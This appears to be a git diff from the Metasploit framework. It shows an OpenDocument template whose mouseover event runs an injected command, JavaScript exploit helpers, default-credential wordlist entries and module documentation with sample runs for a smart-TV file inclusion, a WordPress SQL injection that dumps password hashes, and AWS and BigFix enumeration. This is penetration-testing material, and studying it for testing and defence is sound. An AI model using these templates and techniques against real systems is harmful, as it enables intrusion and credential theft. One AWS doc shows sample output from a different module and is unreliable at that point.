xmlns:xhtml="http://www.w3.org/1999/xhtml" xmlns:grddl="http://www.w3.org/2003/g/data-view#" xmlns:officeooo="http://openoffice.org/2009/office" xmlns:tableooo="http://openoffice.org/2009/table" xmlns:drawooo="http://openoffice.org/2010/draw" xmlns:calcext="urn:org:documentfoundation:names:experimental:calc:xmlns:calcext:1.0" xmlns:loext="urn:org:documentfoundation:names:experimental:office:xmlns:loext:1.0" xmlns:field="urn:openoffice:names:experimental:ooo-ms-interop:xmlns:field:1.0" xmlns:formx="urn:openoffice:names:experimental:ooxml-odf-interop:xmlns:form:1.0" xmlns:css3t="http://www.w3.org/TR/css3-text/" office:version="1.2" office:mimetype="application/vnd.oasis.opendocument.text">
<office:meta><meta:creation-date>2019-01-30T10:53:06.762000000</meta:creation-date><dc:date>2019-01-30T10:53:49.512000000</dc:date><meta:editing-duration>PT44S</meta:editing-duration><meta:editing-cycles>1</meta:editing-cycles><meta:document-statistic meta:table-count="0" meta:image-count="0" meta:object-count="0" meta:page-count="1" meta:paragraph-count="1" meta:word-count="1" meta:character-count="4" meta:non-whitespace-character-count="4"/><meta:generator>LibreOffice/6.1.2.1$Windows_X86_64 LibreOffice_project/65905a128db06ba48db947242809d14d3f9a93fe</meta:generator></office:meta>
<office:scripts>
<office:script script:language="ooo:Basic">
<ooo:libraries xmlns:ooo="http://openoffice.org/2004/office" xmlns:xlink="http://www.w3.org/1999/xlink">
<ooo:library-embedded ooo:name="Standard"/>
</ooo:libraries>
</office:script>
</office:scripts>
<office:styles>
<style:default-style style:family="graphic">
<style:graphic-properties svg:stroke-color="#3465a4" draw:fill-color="#729fcf" fo:wrap-option="no-wrap" draw:shadow-offset-x="0.1181in" draw:shadow-offset-y="0.1181in" draw:start-line-spacing-horizontal="0.1114in" draw:start-line-spacing-vertical="0.1114in" draw:end-line-spacing-horizontal="0.1114in" draw:end-line-spacing-vertical="0.1114in" style:flow-with-text="false"/>
<style:paragraph-properties style:text-autospace="ideograph-alpha" style:line-break="strict" style:font-independent-line-spacing="false">
<style:tab-stops/>
</style:paragraph-properties>
<style:text-properties style:use-window-font-color="true" style:font-name="Liberation Serif" fo:font-size="96pt" fo:language="en" fo:country="US" style:letter-kerning="true" style:font-name-asian="NSimSun" style:font-size-asian="96pt" style:language-asian="zh" style:country-asian="CN" style:font-name-complex="Arial" style:font-size-complex="96pt" style:language-complex="hi" style:country-complex="IN"/>
</style:default-style>
<style:default-style style:family="paragraph">
<style:paragraph-properties fo:orphans="2" fo:widows="2" fo:hyphenation-ladder-count="no-limit" style:text-autospace="ideograph-alpha" style:punctuation-wrap="hanging" style:line-break="strict" style:tab-stop-distance="0.4925in" style:writing-mode="page"/>
<style:text-properties style:use-window-font-color="true" style:font-name="Liberation Serif" fo:font-size="96pt" fo:language="en" fo:country="US" style:letter-kerning="true" style:font-name-asian="NSimSun" style:font-size-asian="96pt" style:language-asian="zh" style:country-asian="CN" style:font-name-complex="Arial" style:font-size-complex="96pt" style:language-complex="hi" style:country-complex="IN" fo:hyphenate="false" fo:hyphenation-remain-char-count="2" fo:hyphenation-push-char-count="2"/>
</style:default-style>
<style:default-style style:family="table">
<style:table-properties table:border-model="collapsing"/>
</style:default-style>
<style:default-style style:family="table-row">
<style:table-row-properties fo:keep-together="auto"/>
</style:default-style>
<style:style style:name="Standard" style:family="paragraph" style:class="text"/>
<style:style style:name="Text_20_body" style:display-name="Text body" style:family="paragraph" style:parent-style-name="Standard" style:class="text">
<style:paragraph-properties fo:margin-top="0in" fo:margin-bottom="0.0972in" loext:contextual-spacing="false" fo:line-height="115%"/>
</style:style>
<style:style style:name="Internet_20_link" style:display-name="Internet link" style:family="text">
<style:text-properties fo:color="#ffffff" fo:language="zxx" fo:country="none" style:text-underline-style="solid" style:text-underline-width="auto" style:text-underline-color="font-color" style:language-asian="zxx" style:country-asian="none" style:language-complex="zxx" style:country-complex="none"/>
</style:style>
</office:styles>
<office:master-styles>
<style:master-page style:name="Standard" style:page-layout-name="pm1"/>
</office:master-styles>
<office:body>
<office:text>
<text:p text:style-name="Standard"><text:a xlink:type="simple" xlink:href="http://<%=text_content%>/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link"><office:event-listeners><script:event-listener script:language="ooo:script" script:event-name="dom:mouseover" xlink:href="vnd.sun.star.script:<%= path %>$tempfilepager(1, <%= @cmd %>)?language=Python&amp;location=share" xlink:type="simple"/></office:event-listeners><text:span text:style-name="T1"><%= text_content %></text:span></text:a></text:p>
</office:text>
</office:body>
</office:document>
+12
View File
@@ -79,6 +79,18 @@ function Int64(v) {
return '0x' + hexlify(Array.from(bytes).reverse());
};
this.lo = function()
{
var b = this.bytes();
return (b[0] | (b[1] << 8) | (b[2] << 16) | (b[3] << 24)) >>> 0;
};
this.hi = function()
{
var b = this.bytes();
return (b[4] | (b[5] << 8) | (b[6] << 16) | (b[7] << 24)) >>> 0;
};
// Basic arithmetic.
// These functions assign the result of the computation to their 'this' object.
+133
View File
@@ -46,6 +46,139 @@ function hexdump(data) {
return lines.join('\n');
}
function strcmp(b, str)
{
var fn = typeof b == "function" ? b : function(i) { return b[i]; };
for(var i = 0; i < str.length; ++i)
{
if(fn(i) != str.charCodeAt(i))
{
return false;
}
}
return fn(str.length) == 0;
}
function b2u32(b)
{
return (b[0] | (b[1] << 8) | (b[2] << 16) | (b[3] << 24)) >>> 0;
}
function off2addr(segs, off)
{
if(!(off instanceof Int64)) off = new Int64(off);
for(var i = 0; i < segs.length; ++i)
{
var start = segs[i].fileoff;
var end = Add(start, segs[i].size);
if
(
(start.hi() < off.hi() || (start.hi() == off.hi() && start.lo() <= off.lo())) &&
(end.hi() > off.hi() || (end.hi() == off.hi() && end.lo() > off.lo()))
)
{
return Add(segs[i].addr, Sub(off, start));
}
}
return new Int64("0x4141414141414141");
}
function fsyms(mem, base, segs, want, syms)
{
want = Array.from(want); // copy
if(syms === undefined)
{
syms = {};
}
var stab = null;
var ncmds = mem.u32(Add(base, 0x10));
for(var i = 0, off = 0x20; i < ncmds; ++i)
{
var cmd = mem.u32(Add(base, off));
if(cmd == 0x2) // LC_SYMTAB
{
var b = mem.read(Add(base, off + 0x8), 0x10);
stab =
{
symoff: b2u32(b.slice(0x0, 0x4)),
nsyms: b2u32(b.slice(0x4, 0x8)),
stroff: b2u32(b.slice(0x8, 0xc)),
strsize: b2u32(b.slice(0xc, 0x10)),
};
break;
}
off += mem.u32(Add(base, off + 0x4));
}
if(stab == null)
{
fail("stab");
}
var tmp = { base: off2addr(segs, stab.stroff), off: 0 };
var fn = function(i)
{
return mem.read(Add(tmp.base, tmp.off + i), 1)[0];
};
for(var i = 0; i < stab.nsyms && want.length > 0; ++i)
{
tmp.off = mem.u32(off2addr(segs, stab.symoff + i * 0x10));
for(var j = 0; j < want.length; ++j)
{
var s = want[j];
if((strcmp(fn, s)))
{
syms[s] = mem.readInt64(off2addr(segs, stab.symoff + i * 0x10 + 0x8));
want.splice(j, 1);
break;
}
}
}
return syms;
}
function strcmp(b, str)
{
var fn = typeof b == "function" ? b : function(i) { return b[i]; };
for(var i = 0; i < str.length; ++i)
{
if(fn(i) != str.charCodeAt(i))
{
return false;
}
}
return fn(str.length) == 0;
}
function _u32(i)
{
return b2u32(this.read(i, 4));
}
function _read(i, l)
{
if (i instanceof Int64) i = i.lo();
if (l instanceof Int64) l = l.lo();
if (i + l > this.length)
{
fail(`OOB read: ${i} -> ${i + l}, size: ${l}`);
}
return this.slice(i, i + l);
}
function _readInt64(addr)
{
return new Int64(this.read(addr, 8));
}
function _writeInt64(i, val)
{
if (i instanceof Int64) i = i.lo();
this.set(val.bytes(), i);
}
// Simplified version of the similarly named python module.
var Struct = (function() {
// Allocate these once to avoid unecessary heap allocations during pack/unpack operations.
+15
View File
@@ -0,0 +1,15 @@
#EXTM3U
#EXT-X-VERSION:3
#EXT-X-TARGETDURATION:4
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:3.433333,
epicsax0.ts
#EXTINF:1.700000,
epicsax1.ts
#EXTINF:1.700000,
epicsax2.ts
#EXTINF:1.700000,
epicsax3.ts
#EXTINF:1.466667,
epicsax4.ts
#EXT-X-ENDLIST
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
+4
View File
@@ -0,0 +1,4 @@
244+0000009999
188+030000
19b+00000F
19b+000010
+1
View File
@@ -4,3 +4,4 @@ root
Administrator
USERID
guest
Admin
+1
View File
@@ -405,6 +405,7 @@ root realtek
root root
root tini
root tslinux
root ubnt
root user
root vizxv
root wyse
+1 -1
View File
@@ -44,7 +44,7 @@ apc
bintec
blue
c
cable-d
cable-docsis
canon_admin
cc
cisco
File diff suppressed because it is too large Load Diff
File diff suppressed because it is too large Load Diff
+18615 -4296
View File
File diff suppressed because it is too large Load Diff
+29 -1
View File
@@ -11,7 +11,7 @@
#
# It's strongly recommended that you check this file into your version control system.
ActiveRecord::Schema.define(version: 20161227212223) do
ActiveRecord::Schema.define(version: 20190507120211) do
# These are extensions that must be enabled in order to support this database
enable_extension "plpgsql"
@@ -22,6 +22,17 @@ ActiveRecord::Schema.define(version: 20161227212223) do
t.datetime "updated_at", null: false
end
create_table "async_callbacks", force: :cascade do |t|
t.string "uuid", null: false
t.integer "timestamp", null: false
t.string "listener_uri"
t.string "target_host"
t.string "target_port"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.uuid "{:null=>false}"
end
create_table "automatic_exploitation_match_results", force: :cascade do |t|
t.integer "match_id"
t.integer "run_id"
@@ -475,6 +486,23 @@ ActiveRecord::Schema.define(version: 20161227212223) do
add_index "notes", ["ntype"], name: "index_notes_on_ntype", using: :btree
add_index "notes", ["vuln_id"], name: "index_notes_on_vuln_id", using: :btree
create_table "payloads", force: :cascade do |t|
t.string "name"
t.string "uuid"
t.integer "uuid_mask"
t.integer "timestamp"
t.string "arch"
t.string "platform"
t.string "urls"
t.string "description"
t.string "raw_payload"
t.string "raw_payload_hash"
t.string "build_status"
t.string "build_opts"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
end
create_table "profiles", force: :cascade do |t|
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
@@ -2,9 +2,11 @@ This module plays (by default) ["Epic sax guy 10 hours"](https://www.youtube.com
Naturally, audio should be cranked to 11 before running this module.
Only the deprecated DIAL protocol is supported by this module. Casting via the newer CASTV2 protocol is unsupported at this time.
## Verification Steps
1. Do: ```use auxiliary/scanner/http/chromecast_webserver ```
1. Do: ```use auxiliary/admin/chromecast/chromecast_youtube```
2. Do: ```set RHOST [IP]```
3. Do: ```run```
@@ -0,0 +1,35 @@
## Summary
This module exploits an unauthenticated remote file inclusion which exists in Supra Smart Cloud TV.
The media control for the device doesn't have any session management or authentication. Leveraging this, an
attacker on the local network can send a crafted request to broadcast a fake video.
**Reference:** https://www.inputzero.io/2019/06/hacking-smart-tv.html
## Verification Steps
1. `use auxiliary/admin/http/supra_smart_cloud_tv_rfi `
2. `set RHOSTS [IP]`
3. `set SRVHOST [IP]`
4. `run`
Doo-doodoodoodoodoo-doo, Epic Sax Guy will be broadcasted to the remote system.
## Sample Output
```
msf5 > use auxiliary/admin/http/supra_smart_cloud_tv_rfi
msf5 auxiliary(admin/http/supra_smart_cloud_tv_rfi) > set SRVHOST 192.168.1.132
SRVHOST => 192.168.1.132
msf5 auxiliary(admin/http/supra_smart_cloud_tv_rfi) > set RHOSTS 192.168.1.155
RHOSTS => 192.168.1.155
msf5 auxiliary(admin/http/supra_smart_cloud_tv_rfi) > run
[*] Running module against 192.168.1.155
[*] Using URL: http://192.168.1.132:8080/
[*] Broadcasting Epic Sax Guy to 192.168.1.155:80
[+] Doo-doodoodoodoodoo-doo
[*] Sleeping for 10s serving .m3u8 and .ts files...
[*] Server stopped.
[*] Auxiliary module execution completed
msf5 auxiliary(admin/http/supra_smart_cloud_tv_rfi) >
```
@@ -0,0 +1,33 @@
## Vulnerable Application
This module works against the Wordpress plugin `wp-google-maps` between 7.11.00 and 7.11.17 (included).
[The vulnerable version is available on WordPress' plugin directory](https://downloads.wordpress.org/plugin/wp-google-maps.7.11.17.zip).
## Verification Steps
1. `msfconsole`
2. `use auxiliary/admin/http/wp_google_maps_sqli`
3. `set RHOSTS <rhost>`
4. Set `DB_PREFIX` if necessary
5. `run`
## Options
### `DB_PREFIX`
Change the table prefix. By default, this option is set to `wp_`.
## Scenarios
### wp-google-maps 7.11.17 on WordPress 4.9.5
```
msf5 auxiliary(admin/http/wp_google_maps_sqli) > exploit
[*] Running module against 172.22.222.144
[*] 172.22.222.144:80 - Trying to retrieve the wp_users table...
[+] Credentials saved in: /home/msfdev/.msf4/loot/20190415065921_default_172.22.222.144_wp_google_maps.j_022930.bin
[+] 172.22.222.144:80 - Found msfdev <hash> <email>
[*] Auxiliary module execution completed
```
@@ -29,6 +29,11 @@
records cracked password hashes. Kali linux's default location is `/root/.john/john.pot`.
Default is `~/.msf4/john.pot`.
**DeleteTempFiles**
This option will prevent deletion of the wordlist and file containing hashes. This may be useful for
running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
## Scenarios
In this scenario, we fill a bunch of different hash types into the creds db. You'll need a
@@ -28,6 +28,11 @@
The path to an optional custom wordlist. This file is added to the new wordlist which may include the other
`USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
**DeleteTempFiles**
This option will prevent deletion of the wordlist and file containing hashes. This may be useful for
running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
**ITERATION_TIMEOUT**
The max-run-time for each iteration of cracking
@@ -36,6 +36,11 @@
Include `blowfish` and `SHA`(256/512) passwords.
**DeleteTempFiles**
This option will prevent deletion of the wordlist and file containing hashes. This may be useful for
running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
**CUSTOM_WORDLIST**
The path to an optional custom wordlist. This file is added to the new wordlist which may include the other
@@ -30,6 +30,11 @@
The path to an optional custom wordlist. This file is added to the new wordlist which may include the other
`USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
**DeleteTempFiles**
This option will prevent deletion of the wordlist and file containing hashes. This may be useful for
running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
**ITERATION_TIMEOUT**
The max-run-time for each iteration of cracking
@@ -29,6 +29,11 @@
The path to an optional custom wordlist. This file is added to the new wordlist which may include the other
`USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
**DeleteTempFiles**
This option will prevent deletion of the wordlist and file containing hashes. This may be useful for
running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
**ITERATION_TIMEOUT**
The max-run-time for each iteration of cracking
@@ -37,6 +37,11 @@
The path to an optional custom wordlist. This file is added to the new wordlist which may include the other
`USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
**DeleteTempFiles**
This option will prevent deletion of the wordlist and file containing hashes. This may be useful for
running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
**ITERATION_TIMEOUT**
The max-run-time for each iteration of cracking
@@ -32,6 +32,11 @@
The path to an optional custom wordlist. This file is added to the new wordlist which may include the other
`USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
**DeleteTempFiles**
This option will prevent deletion of the wordlist and file containing hashes. This may be useful for
running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
**ITERATION_TIMEOUT**
The max-run-time for each iteration of cracking
@@ -29,6 +29,11 @@
The path to an optional custom wordlist. This file is added to the new wordlist which may include the other
`USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
**DeleteTempFiles**
This option will prevent deletion of the wordlist and file containing hashes. This may be useful for
running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
**ITERATION_TIMEOUT**
The max-run-time for each iteration of cracking
@@ -0,0 +1,34 @@
## Vulnerable Application
This module is able to extract a zip file sent through Modbus from a pcap.
Tested with Schneider TM221CE16R
## Verification Steps
1. Do: `use auxiliary/analyze/modbus_zip`
2. Do: `set PCAPFILE <PATH_TO_PCAP>` where PATH_TO_PCAP is the PATH to the pcap file
3. Do: `exploit` extract the zip file
## Options
**MODE**
Default: UPLOAD. Changes offset within a packet that is used to check for a zip header.
## Scenarios
```
msf > use auxiliary/analyze/modbus_zip
msf auxiliary(analyze/modbus_zip) > set PCAPFILE file.pcap
PCAPFILE => file.pcap
auxiliary(analyze/modbus_zip) > set MODE DOWNLOAD
MODE => DOWNLOAD
msf auxiliary(analyze/modbus_zip) > exploit
[*] Running module against 0.0.0.0
[*] Zip start on packet 1370
[*] Zip end on packet 1452
[*] Done!
[*] Auxiliary module execution completed
```
@@ -0,0 +1,117 @@
## Vulnerable Application
Amazon Web Services (AWS) resources can be managed through an API that authenticates based on an `ACCESS_KEY_ID` and a `SECRET_ACCESS_KEY`. With these two pieces of information, an attacker can gain privileges which may include enumerating resources within the AWS account.
This module authenticates to AWS EC2 (Elastic Compute Cloud) to identify compute instances that the credentials can see. The instances themselves may be connected to the public Internet, but are likely to be protected by security groups and subnet network ACLs. In any case, knowledge of the instances is the first step in evaluating their security.
## Verification Steps
### Create or acquire the credentials
1. (If necessary) Create an AWS account. Free trials are available.
2. Login to the [AWS Console](https:\\console.aws.amazon.com\).
3. Use the dropbown menu in the top-right with your username, then click on "My Security Credentials".
4. Expand the "Access Keys" pane and click "Create New Access Key".
5. Follow the steps in the AWS console, making sure to record both the 'access key ID' and 'secret access key'. (The 'secret access key' is only shown once, then can never be retrieved.)
### Enumerate AWS resources using the credentials
1. Start msfconsole
2. `use auxiliary/cloud/aws/enum_ec2`
3. Set the `ACCESS_KEY_ID` and `SECRET_ACCESS_KEY` options.
4. Optionally, set the `REGION` and `LIMIT` options.
5. `run`
## Options
**ACCESS_KEY_ID**
This AWS credential is like a username. It uniquely identifies the user, and is paired with a 'secret access key'. The access key ID is retrievable through the AWS console.
An example `ACCESS_KEY_ID` would be `AKIA5C76TR3KXHXA5CRC`
**SECRET_ACCESS_KEY**
This AWS credential is like a password, and should be treated as such. It is paired with a 'access key ID'. The access key ID cannot be retrieved from AWS after it has been generated, but it may be discoverable through environment variables, configuration files, source code, or backups.
An example `SECRET_ACCESS_KEY` would be `EKfx3wOWWiGk1WgBTAZfF\2dq3SbDsQj4jdyOMOv`.
## Scenarios
### Provided a valid 'access key ID' and 'secret access key' with sufficient privileges
```
msf5 auxiliary(cloud/aws/enum_iam) > run
[+] Found 3 users.
[+] User Name: test1
[+] User ID: AIDA5C76TR3KTTO3PTAJ7
[+] Creation Date: 2019-06-14 18:18:23 UTC
[+] Tags: []
[+] Groups: []
[+] SSH Pub Keys: []
[+] Policies: IAMUserChangePassword
[+] Signing certs: []
[+] Password Used: 2019-06-17 19:55:57 UTC
[+] AWS Access Keys: AKIA5C76TR3K3JN3FYUE (Active)
[+] Console login: Enabled
[+] Two-factor auth: Enabled on 2019-06-17 20:01:05 UTC
[*]
[+] User Name: test2
[+] User ID: AIDA5C76TR3KVHWFEQSDL
[+] Creation Date: 2019-06-14 18:18:35 UTC
[+] Tags: []
[+] Groups: ["mygroup", "mygroup2"]
[+] SSH Pub Keys: []
[+] Policies: IAMUserChangePassword
[+] Signing certs: []
[+] Password Used: (Never)
[+] AWS Access Keys: AKIA5C76TR3KXHXA5CRC (Inactive)
[+] Console login: Enabled
[+] Two-factor auth: Disabled
[*]
[+] User Name: test3
[+] User ID: AIDA5C76TR3KYI2HC4MOL
[+] Creation Date: 2019-06-14 18:18:44 UTC
[+] Tags: []
[+] Groups: ["mygroup"]
[+] SSH Pub Keys: []
[+] Policies: []
[+] Signing certs: []
[+] Password Used: (Never)
[+] AWS Access Keys: AKIA5C76TR3KWWADYZNB (Active)
[+] Console login: Disabled
[+] Two-factor auth: Disabled
[*]
[*] Auxiliary module execution completed
```
### Provided an invalid or inactive 'access key ID'
```
msf5 auxiliary(cloud/aws/enum_iam) > run
[-] Auxiliary aborted due to failure: unexpected-reply: The security token included in the request is invalid.
[*] Auxiliary module execution completed
msf5 auxiliary(cloud/aws/enum_iam) >
```
### Provided an invalid 'secret access key'
```
msf5 auxiliary(cloud/aws/enum_iam) > run
[-] Auxiliary aborted due to failure: unexpected-reply: The request signature we calculated does not match the signature you provided. Check your AWS Secret Access Key and signing method. Consult the service documentation for details.
[*] Auxiliary module execution completed
msf5 auxiliary(cloud/aws/enum_iam) >
```
### Provided an 'access key ID' or 'secret access key' with insufficient privileges
```
msf5 auxiliary(cloud\aws\enum_ec2) > run
[-] Auxiliary aborted due to failure: unexpected-reply: User: arn:aws:iam::899712345657:user/test1 is not authorized to perform: iam:ListUsers on resource: arn:aws:iam::899712345657:user/
[*] Auxiliary module execution completed
msf5 auxiliary(cloud\aws\enum_ec2) >
```
@@ -0,0 +1,102 @@
## Vulnerable Application
Amazon Web Services (AWS) resources can be managed through an API that authenticates based on an `ACCESS_KEY_ID` and a `SECRET_ACCESS_KEY`. With these two pieces of information, an attacker can gain privileges which may include enumerating resources within the AWS account.
This module authenticates to AWS IAM (Identify Access Module) to identify user accounts that the credentials can see. The users themselves are likely protected with different credentials, including passwords or MFA tokens. In any case, knowledge of the users is the first step in evaluating their security.
## Verification Steps
### Create or acquire the credentials
1. (If necessary) Create an AWS account. Free trials are available.
2. Login to the [AWS Console](https:\\console.aws.amazon.com\).
3. Use the dropbown menu in the top-right with your username, then click on "My Security Credentials".
4. Expand the "Access Keys" pane and click "Create New Access Key".
5. Follow the steps in the AWS console, making sure to record both the 'access key ID' and 'secret access key'. (The 'secret access key' is only shown once, then can never be retrieved.)
### Enumerate AWS resources using the credentials
1. Start msfconsole
2. `use auxiliary/cloud/aws/enum_iam`
3. Set the `ACCESS_KEY_ID` and `SECRET_ACCESS_KEY` options.
4. `run`
## Options
**ACCESS_KEY_ID**
This AWS credential is like a username. It uniquely identifies the user, and is paired with a 'secret access key'. The access key ID is retrievable through the AWS console.
An example `ACCESS_KEY_ID` would be `AKIA5C76TR3KXHXA5CRC`
**SECRET_ACCESS_KEY**
This AWS credential is like a password, and should be treated as such. It is paired with a 'access key ID'. The access key ID cannot be retrieved from AWS after it has been generated, but it may be discoverable through environment variables, configuration files, source code, or backups.
An example `SECRET_ACCESS_KEY` would be `EKfx3wOWWiGk1WgBTAZfF\2dq3SbDsQj4jdyOMOv`.
**REGION**
AWS resources are located in regions. Optionally, this module's output can be filtered based on region to minimize the query to AWS. Alternatively, `REGION` can be left blank, such that all regions will be checked.
An example region would be `us-west-2`.
**LIMIT**
Some AWS API calls support limiting output, such that the module will only reutrn the number of instances, without detailing the configuration of each instance. Optionally, this module's output can be filtered to minimize the query to AWS and the user output. Alternatively, `LIMIT` can be left blank, such that all EC2 instances will be detailed.
Note that the `LIMIT` parameter is imposed per region, so the total number of results may be higher than the user-specified limit, but the maximum number of results for a single region will not exceed `LIMIT`. This behavior is due to the AWS API.
An example `LIMIT` would be `10`.
## Scenarios
### Provided a valid 'access key ID' and 'secret access key' with sufficient privileges
```
msf5 auxiliary(cloud/aws/enum_ec2) > run
[*] Found 0 instances in eu-north-1
[*] Found 0 instances in ap-south-1
[*] Found 0 instances in eu-west-3
[*] Found 0 instances in eu-west-2
[*] Found 0 instances in eu-west-1
[*] Found 0 instances in ap-northeast-2
[*] Found 0 instances in ap-northeast-1
[*] Found 0 instances in sa-east-1
[*] Found 0 instances in ca-central-1
[*] Found 0 instances in ap-southeast-1
[*] Found 0 instances in ap-southeast-2
[*] Found 0 instances in eu-central-1
[*] Found 0 instances in us-east-1
[*] Found 0 instances in us-east-2
[*] Found 0 instances in us-west-1
[*] Found 1 instances in us-west-2
[+] i-0f8bb3bbb06faf58d (running)
[+] Creation Date: 2019-06-11 23:14:48 UTC
[+] Public IP: 18.236.87.255 (ec2-18-236-87-255.us-west-2.compute.amazonaws.com)
[+] Private IP: 18.236.87.255 (ip-172-31-30-21.us-west-2.compute.internal)
[+] Security Group: sg-0d52cc35aaf82aff5
[*] Auxiliary module execution completed
msf5 auxiliary(cloud/aws/enum_ec2) >
```
### Provided an invalid or inactive 'access key ID', or an invalid 'secret access key'
```
msf5 auxiliary(cloud\aws\enum_ec2) > run
[-] Auxiliary aborted due to failure: unexpected-reply: AWS was not able to validate the provided access credentials
[*] Auxiliary module execution completed
msf5 auxiliary(cloud\aws\enum_ec2) >
```
### Provided an 'access key ID' or 'secret access key' with insufficient privileges
```
msf5 auxiliary(cloud\aws\enum_ec2) > run
[-] Auxiliary aborted due to failure: unexpected-reply: You are not authorized to perform this operation.
[*] Auxiliary module execution completed
msf5 auxiliary(cloud\aws\enum_ec2) >
```
@@ -0,0 +1,95 @@
## Vulnerable Application
Amazon Web Services (AWS) resources can be managed through an API that authenticates based on an `ACCESS_KEY_ID` and a `SECRET_ACCESS_KEY`. With these two pieces of information, an attacker can gain privileges which may include enumerating resources within the AWS account.
This module authenticates to AWS S3 (Simple Storage Service), to identify buckets that the credentials can see. The files contained within buckets may be publicly readable and/or writable, or they may be locked down. In any case, knowledge of the buckets is the first step in evaluating their security.
## Verification Steps
### Create or acquire the credentials
1. (If necessary) Create an AWS account. Free trials are available.
2. Login to the [AWS Console](https://console.aws.amazon.com/).
3. Use the dropbown menu in the top-right with your username, then click on "My Security Credentials".
4. Expand the "Access Keys" pane and click "Create New Access Key".
5. Follow the steps in the AWS console, making sure to record both the 'access key ID' and 'secret access key'. (The 'secret access key' is only shown once, then can never be retrieved.)
### Enumerate AWS resources using the credentials
1. Start msfconsole
2. `use auxiliary/cloud/aws/enum_s3`
3. Set the `ACCESS_KEY_ID` and `SECRET_ACCESS_KEY` options.
4. Optionally, set the `REGION` option.
5. `run`
## Options
**ACCESS_KEY_ID**
This AWS credential is like a username. It uniquely identifies the user, and is paired with a 'secret access key'. The access key ID is retrievable through the AWS console.
An example `ACCESS_KEY_ID` would be `AKIA5C76TR3KXHXA5CRC`
**SECRET_ACCESS_KEY**
This AWS credential is like a password, and should be treated as such. It is paired with a 'access key ID'. The access key ID cannot be retrieved from AWS after it has been generated, but it may be discoverable through environment variables, configuration files, source code, or backups.
An example `SECRET_ACCESS_KEY` would be `EKfx3wOWWiGk1WgBTAZfF/2dq3SbDsQj4jdyOMOv`.
**REGION**
AWS resources are located in regions. Optionally, this module's output can be filtered based on region to minimize the query to AWS. Alternatively, `REGION` can be left blank, such that all regions will be checked.
An example region would be `us-west-2`.
## Scenarios
### Provided a valid 'access key ID' and 'secret access key' with sufficient privileges
```
msf5 auxiliary(cloud/aws/enum_s3) > run
[+] Found 1 buckets.
[+] Name: asoto-secret-demo-bucket
[+] Creation Date: 2019-06-13 23:30:26 UTC
[+] # of Objects: 0
[+] Region: us-west-2
[+] Website: /index.html
[+] Owner: asoto
[+] Permissions:
[+] User 'asoto' granted FULL_CONTROL
[+] Group '' (http://acs.amazonaws.com/groups/s3/LogDelivery) granted READ
[*]
[*] Done.
[*] Auxiliary module execution completed
msf5 auxiliary(cloud/aws/enum_s3) > exit
```
### Provided an invalid or inactive 'access key ID'
```
msf5 auxiliary(cloud/aws/enum_s3) > run
[-] Auxiliary aborted due to failure: unexpected-reply: The AWS Access Key Id you provided does not exist in our records.
[*] Auxiliary module execution completed
msf5 auxiliary(cloud/aws/enum_s3) >
```
### Provided an invalid 'secret access key'
```
msf5 auxiliary(cloud/aws/enum_s3) > run
[-] Auxiliary aborted due to failure: unexpected-reply: The request signature we calculated does not match the signature you provided. Check your key and signing method.
[*] Auxiliary module execution completed
msf5 auxiliary(cloud/aws/enum_s3) >
```
### Provided an 'access key ID' or 'secret access key' with insufficient privileges
```
msf5 auxiliary(cloud/aws/enum_s3) > run
[-] Auxiliary aborted due to failure: unexpected-reply: Access Denied
[*] Auxiliary module execution completed
msf5 auxiliary(cloud/aws/enum_s3) >
```
@@ -0,0 +1,66 @@
## Description
This module performs unauthenticated requests to retrieve masthead, sites, and packages information from IBM BigFix Relay Servers. If the **DOWNLOAD** option is set then the module will attempt to download the identified packages. This module has been tested against Relay Server 9.5.10.79.
## Vulnerable Application
BigFix Platform 9.2 - 9.2.16 and 9.5 - 9.5.11
## Options
**SHOW_MASTHEAD**
Default: true. Read Organization name from `/masthead/masthead.axfm`
**SHOW_PACKAGES**
Default true. Read Action values and packages names from `/cgi-bin/bfenterprise/BESMirrorRequest.exe`
**SHOW_SITES**
Default true. Read Site URLs from `/cgi-bin/bfenterprise/clientregister.exe?RequestType=FetchCommands`
**DOWNLOAD**
Default true. Attempt to download identified packages.
**ShowURL**
Default false. Show full URL for the packages instead of the filename.
## Verification Steps
1. `./msfconsole -q`
2. `use auxiliary/gather/ibm_bigfix_sites_packages_enum`
3. `set rhosts <rhost>`
4. `exploit`
## Scenarios
### Relay Version 9.5.10.79
```
msf5 > use auxiliary/gather/ibm_bigfix_sites_packages_enum
msf5 auxiliary(gather/ibm_bigfix_sites_packages_enum) > set rhosts <rhost>
rhosts => <rhost>
msf5 auxiliary(gather/ibm_bigfix_sites_packages_enum) > exploit
[*] Running module against [IP]
[+] [Organization]
[+] http://[hostname]:52311/cgi-bin/bfgather.exe/actionsite
[+] http://[hostname]:52311/cgi-bin/bfenterprise/PostResults.exe
<snip>
[*] Sites
[+] http://[hostname]:52311/cgi-bin/bfgather.exe/[site]
[+] http://[hostname]:52311/cgi-bin/bfgather.exe/[site]
[+] http://[hostname]:52311/cgi-bin/bfgather.exe/[site]
<snip>
[*] Packages
[*] Action: [action number]
[+] File: [package name]
[*] Action: [action number]
[+] File: [package name]
<snip>
[*] Auxiliary module execution completed
msf5 auxiliary(gather/ibm_bigfix_sites_packages_enum) >
```
@@ -0,0 +1,79 @@
## Description
